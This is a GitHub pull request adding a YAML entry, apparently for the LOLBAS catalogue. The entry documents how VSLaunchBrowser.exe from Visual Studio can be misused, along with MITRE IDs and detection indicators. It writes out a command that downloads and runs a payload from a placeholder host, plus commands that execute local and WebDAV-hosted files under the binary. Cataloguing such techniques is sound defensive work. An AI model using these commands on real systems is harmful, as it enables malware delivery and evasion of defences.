Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Add VSLaunchBrowser.yml #367

Open
wants to merge 3 commits into
base: master
Choose a base branch
from
Open
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Jump to
Jump to file
Failed to load files.
Diff view
Diff view
39 changes: 39 additions & 0 deletions yml/OtherMSBinaries/VsLaunchBrowser.yml
Original file line number Diff line number Diff line change
@@ -0,0 +1,39 @@
---
Name: VSLaunchBrowser.exe
Description: Microsoft Visual Studio browser launcher tool for web applications debugging
Author: Avihay Eldad
Created: 2024-04-12
Commands:
- Command: VSLaunchBrowser.exe .exe http://example.com/payload
Description: Download and execute payload from remote server
Usecase: It will download a remote file to INetCache and open it using the default app associate with the supplied file extension via VSLaunchBrowser as parent process.
Category: Download
Privileges: User
MitreID: T1105
OperatingSystem: Windows
Tags:
- Download: INetCache
- Command: VSLaunchBrowser.exe .exe C:\Windows\System32\calc.exe
Description: Execute payload via VSLaunchBrowser as parent process
Usecase: It will open a file using the default app associate with the supplied file extension via VSLaunchBrowser as parent process.
Category: Execute
Privileges: User
MitreID: T1127
OperatingSystem: Windows
- Command: VSLaunchBrowser.exe .exe \\Server\Path\file
Description: Execute payload from WebDAV server via VSLaunchBrowser as parent process
Usecase: It will open a remote file using the default app associate with the supplied file extension via VSLaunchBrowser as parent process.
Category: Execute
Privileges: User
MitreID: T1127
OperatingSystem: Windows
Full_Path:
- Path: C:\Program Files\Microsoft Visual Studio\{version}\Community\Common7\IDE\VSLaunchBrowser.exe
- Path: C:\Program Files (x86)\Microsoft Visual Studio\{version}\Community\Common7\IDE\VSLaunchBrowser.exe
Detection:
- IOC: CMD as sub-process of VSLaunchBrowser
- IOC: URL on a VSLaunchBrowser command line
- IOC: VSLaunchBrowser making unexpected network connections or DNS requests
Acknowledgement:
- Person: Avihay Eldad
Handle: '@AvihayEldad'